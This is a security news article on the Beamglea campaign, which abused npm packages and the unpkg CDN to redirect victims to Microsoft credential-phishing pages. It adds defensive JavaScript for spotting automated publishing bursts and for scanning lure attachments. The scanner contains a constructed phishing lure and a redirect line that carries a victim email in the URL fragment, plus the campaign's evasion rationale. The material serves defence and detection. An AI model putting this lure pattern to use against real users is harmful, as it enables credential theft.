Security researchers have discovered 175 malicious packages on the npm registry, collectively downloaded about 26,000 times, that were used as part of a credential phishing campaign named Beamglea. The campaign used npm and unpkg.com as free hosting to serve redirect scripts, which in turn sent victims to Microsoft credential harvesting pages, increasing the realism and success rate of the attacks.
Campaign details
Researchers, including Kush Pandya and investigators at Socket, found that the operation published 175 packages across nine npm accounts. The packages carry randomized names of the form redirect-xxxxxx, so accidental installation by developers is unlikely; the roughly 26,000 downloads are inflated by security teams, automated scanners, and CDN fetches after disclosure, and should not be read as developer installs.
A Python helper, redirect_generator.py, was used to automatically create and publish npm packages with names such as redirect-xxxxxx. The script injects a victim email address and a phishing URL into each package before publishing. Once live, the packages were referenced via the UNPKG CDN, for example unpkg[.]com/redirect-xs13nr@1.0.0/beamglea.js, to deliver a JavaScript file named beamglea.js that contained victim-specific redirect instructions.
The attackers also produced more than 630 HTML files that masquerade as purchase orders, technical specifications, or project documents. When opened in a browser, each file loads the JavaScript from the UNPKG CDN, which immediately redirects the browser to the phishing domain with the victim’s email address in the URL fragment. A fragment is never sent in the HTTP request, so the address does not appear in proxy or web-server logs; the phishing page reads it client-side and pre-fills the email field, creating the impression of a legitimate login portal and lowering the victim’s suspicion, which raises the chance of credential submission.
Why this is notable, and how it worked
Unlike traditional malware that executes on installation, these npm packages did not run malicious code on developers’ systems. Instead the attackers abused trusted infrastructure, using the open npm registry and unpkg.com to host static assets that function as resilient, low-cost phishing infrastructure. By automating package creation and publishing, and by embedding victim-specific data into hosted JavaScript, the threat actors created a scalable and reusable playbook that could be adopted by other groups.
Socket reported that Beamglea targeted more than 135 organizations in industrial, technology, and energy sectors worldwide. The campaign’s reliance on reputable hosting and minimal code highlights how legitimate developer ecosystems can be co-opted into attack infrastructure, while remaining difficult to detect through standard package-audit techniques.
Impact and recommendations
The campaign underlines the need for layered defenses, including user awareness of suspicious document attachments, strict email filtering, and monitoring of inbound traffic to corporate authentication portals. For developers and package registry maintainers, additional controls such as monitoring for automated publishing patterns, stricter account verification, and rapid takedown coordination with CDN providers can reduce abuse of open registries.
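One registry-side control mentioned above is monitoring for automated publishing patterns. The following is an added example written for this article, not Socket's or npm's tooling: a sliding-window heuristic that flags one account pushing many packages with a shared prefix and varying suffix within minutes of each other. The publish records are constructed, and the field names (publisher, name, version, publishedAt) are assumptions rather than npm's actual schema.

```javascript
// Added example for this article, not Socket's or npm's tooling: a registry-
// side heuristic for the "automated publishing pattern" the campaign shows,
// many packages with a shared prefix and a varying suffix pushed from one
// account in a short window. Records below are constructed and the field
// names (publisher, name, version, publishedAt) are assumptions.

// Family key: everything before the last hyphen, so redirect-xs13nr and
// redirect-k8q2wt both land in the "redirect" family.
function familyOf(name) {
  const i = name.lastIndexOf('-');
  return i > 0 ? name.slice(0, i) : name;
}

// Sliding window over each (publisher, family) group. Raises at most one
// alert per group, as soon as minCount packages fall within windowMs.
function detectPublishBursts(records, { windowMs = 10 * 60 * 1000, minCount = 5 } = {}) {
  const groups = new Map();
  for (const r of records) {
    const key = `${r.publisher}|${familyOf(r.name)}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(r);
  }
  const alerts = [];
  for (const [key, list] of groups) {
    list.sort((a, b) => a.publishedAt - b.publishedAt);
    let start = 0;
    for (let end = 0; end < list.length; end++) {
      // Advance the window start until the span fits inside windowMs.
      while (list[end].publishedAt - list[start].publishedAt > windowMs) start++;
      if (end - start + 1 >= minCount) {
        const [publisher, family] = key.split('|');
        alerts.push({
          publisher,
          family,
          inWindow: end - start + 1,
          total: list.length,
          windowSeconds: (list[end].publishedAt - list[start].publishedAt) / 1000,
          names: list.map(r => r.name),
        });
        break;
      }
    }
  }
  return alerts;
}

// Constructed publish log: one account emitting generated names 30 s apart,
// and a normal maintainer releasing related packages days apart.
const t0 = Date.parse('2025-10-01T09:00:00Z');
const sec = 1000;
const day = 24 * 3600 * sec;
const RECORDS = [
  ...['xs13nr', 'k8q2wt', 'm3vz9a', 'p0d7hc', 'r5ytn2', 'w2qa8e'].map((s, i) => ({
    publisher: 'acct-one', name: `redirect-${s}`, version: '1.0.0', publishedAt: t0 + i * 30 * sec,
  })),
  { publisher: 'maintainer', name: 'widget-core', version: '3.2.0', publishedAt: t0 },
  { publisher: 'maintainer', name: 'widget-cli', version: '3.2.0', publishedAt: t0 + 2 * day },
  { publisher: 'maintainer', name: 'widget-docs', version: '1.0.1', publishedAt: t0 + 5 * day },
];

console.log(JSON.stringify(detectPublishBursts(RECORDS), null, 2));
```

The thresholds are deliberately loose defaults; a real deployment would tune them per account age and add the other signals visible in the campaign, such as every package sitting at a single 1.0.0 release and carrying the same file name.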
Security teams should hunt for HTML attachments that contain remote script references to unpkg[.]com, and consider blocking or inspecting such files. Organizations that rely on cloud-based identity providers should enable multi-factor authentication, conditional access policies, and alerting for unusual login flows where an email field is pre-populated from a URL; because the fragment never reaches a server, that last signal is only available from browser or endpoint telemetry, not from proxy logs.
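The hunting advice above, and the redirect chain described under Campaign details, can both be exercised with a small scanner. The following is an added example written for this article, not code from Socket's report or from the campaign: it parses an HTML attachment for scripts loaded from unpkg.com, breaks the unpkg path into package, version and file, and inspects a fetched script body for a client-side redirect that carries data in the URL fragment. The HTML and script bodies are constructed samples; only the unpkg path reuses the one quoted in the article, and the scoring thresholds are assumptions.

```javascript
// Added example for this article, not code from Socket's report or the
// campaign. Samples below are constructed; the unpkg path is the one the
// article quotes, and the scoring thresholds are assumptions.

// <script ... src="https://unpkg.com/<pkg>@<version>/<file>" ...>
const UNPKG_SCRIPT_RE =
  /<script[^>]+src\s*=\s*["']?(?:https?:)?\/\/unpkg\.com\/([^"'\s>]+)["']?[^>]*>/gi;
// unpkg path: optional @scope/, name, optional @version, optional /file
const UNPKG_PATH_RE = /^((?:@[^@\/]+\/)?[^@\/]+)(?:@([^\/]+))?(?:\/(.*))?$/;
// Names produced by the campaign's generator: "redirect-" plus a random suffix
const GENERATED_NAME_RE = /^redirect-[a-z0-9]{4,}$/;

function parseUnpkgPath(path) {
  const m = UNPKG_PATH_RE.exec(path);
  return m ? { pkg: m[1], version: m[2] || null, file: m[3] || null } : null;
}

// Every remote script the attachment loads from unpkg.com, with the reasons
// it is suspicious. A bare unpkg reference is only a weak signal on its own.
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(UNPKG_SCRIPT_RE)) {
    const ref = parseUnpkgPath(m[1]);
    if (!ref) continue;
    const reasons = ['loads remote script from unpkg.com'];
    if (GENERATED_NAME_RE.test(ref.pkg)) reasons.push('randomized redirect-* package name');
    if (ref.file === 'beamglea.js') reasons.push('beamglea.js filename');
    findings.push({ ...ref, reasons });
  }
  return findings;
}

// Inspect a fetched script body for a location-based redirect that appends a
// fragment. The fragment never appears in an HTTP request, so the script body
// is the only place the embedded address can be recovered.
function scanScript(js) {
  const redirect = /(?:window\.|document\.)?location(?:\.href\s*=|\.replace\(|\.assign\()/.test(js);
  const usesFragment = /["']#["']|#[^"'\s]*@/.test(js);
  const targets = [...js.matchAll(/https?:\/\/[^"'\s)]+/g)].map(m => new URL(m[0]).host);
  const emails = [...js.matchAll(/[\w.+-]+@[\w-]+(?:\.[\w-]+)*\.[a-z]{2,}/gi)].map(m => m[0]);
  return { redirect, usesFragment, targets: [...new Set(targets)], emails };
}

// Combine both views into a verdict. Thresholds are assumed; tune per environment.
function assess(html, js) {
  const refs = scanHtml(html);
  const script = js ? scanScript(js) : null;
  let score = refs.reduce((n, r) => n + r.reasons.length, 0);
  if (script) {
    if (script.redirect) score += 2;
    if (script.usesFragment) score += 1;
    if (script.emails.length) score += 1;
  }
  const verdict = score >= 4 ? 'block' : score >= 1 ? 'review' : 'allow';
  return { refs, script, score, verdict };
}

// Constructed samples, not campaign artifacts.
const LURE_HTML = `<!doctype html><html><head><title>Purchase Order 4471</title>
<script src="https://unpkg.com/redirect-xs13nr@1.0.0/beamglea.js"></script>
</head><body>Loading document, please wait...</body></html>`;

const LURE_SCRIPT = `var t="https://login-portal.example/verify";
window.location.replace(t + "#" + "j.doe@victim.example");`;

const BENIGN_HTML = `<html><head>
<script src="https://unpkg.com/react@18.2.0/umd/react.production.min.js"></script>
</head><body></body></html>`;

console.log(JSON.stringify(assess(LURE_HTML, LURE_SCRIPT), null, 2));
console.log(assess(BENIGN_HTML, null).verdict); // review
```

The benign React reference lands on "review" rather than "allow" on purpose: a purchase-order attachment that loads any script from a public CDN deserves a look, while the generated package name, the beamglea.js file and a fragment-carrying redirect together push the lure to "block".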